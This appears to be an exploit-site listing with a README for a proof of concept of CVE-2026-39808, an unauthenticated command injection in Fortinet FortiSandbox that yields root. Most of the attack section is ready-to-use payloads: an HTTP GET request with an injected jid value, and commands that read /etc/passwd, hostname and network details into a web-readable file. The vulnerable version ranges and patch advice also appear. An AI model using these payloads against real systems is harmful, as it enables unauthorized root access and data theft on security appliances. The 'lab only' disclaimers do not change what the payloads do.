Exploit for CVE-2026-39808

Name: Exploit for CVE-2026-39808
Rating: 5 (79 reviews)
2026-04-18 | CVSS 9.8
## https://sploitus.com/exploit?id=0F88C464-CDEB-5235-89C5-50D60E7C53EF
# 🚨 FortiSandbox Root Sandbox Escape - CVE-2026-39808 



----







## 🎯 Overview

This repository contains a clean and well-documented Proof of Concept for **CVE-2026-39808** — a critical unauthenticated command injection vulnerability in Fortinet FortiSandbox that allows **sandbox escape** and remote code execution as **root** (`uid=0`).

### What this PoC demonstrates:
- Path Traversal + Command Injection via the `jid` parameter
- Sandbox breakout from the analysis environment
- Execution of arbitrary commands with root privileges
- Reading system files and network information

---

## 📸 Demo







**Successful exploitation showing `uid=0 gid=0 groups=0`**

---

## 🚀 Affected Versions

| Version Range          | Status      |
|------------------------|-------------|
| FortiSandbox 4.4.0 – 4.4.8 | Vulnerable |
| FortiSandbox 5.0.0 – 5.0.5 | Vulnerable |
| 4.4.9+ / 5.0.6+        | Patched     |

---

## 🛠️ How to Use (Lab Only)

### 1. Simple Payload (Recommended)

```http
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
```

### 2. View the result

Open in browser:
```
https://your-lab-ip/ng/out.txt
```

### 3. Advanced Payload Examples

```bash
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|

# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
```

---

## 📁 Repository Contents

- `poc.py`          → Automated Python exploit
- `burp-request.txt` → Ready-to-use Burp Suite request
- `payloads.md`      → Collection of useful payloads
- `screenshots/`     → Step-by-step exploitation images
- `README.md`        → This file

---

## ⚠️ Important Notes

- **For educational and lab purposes only**
- Do **NOT** use this on any production or unauthorized systems
- Always get proper permission before testing
- Patch your FortiSandbox to version **4.4.9+** or **5.0.6+**

---

## 🛡️ Mitigation

Update FortiSandbox immediately to one of the following versions:
- **4.4.9** or higher
- **5.0.6** or higher

Fortinet has released official patches addressing this vulnerability.

---



**Made for Research & Learning Purposes**  
⭐ Star this repo if it helped you!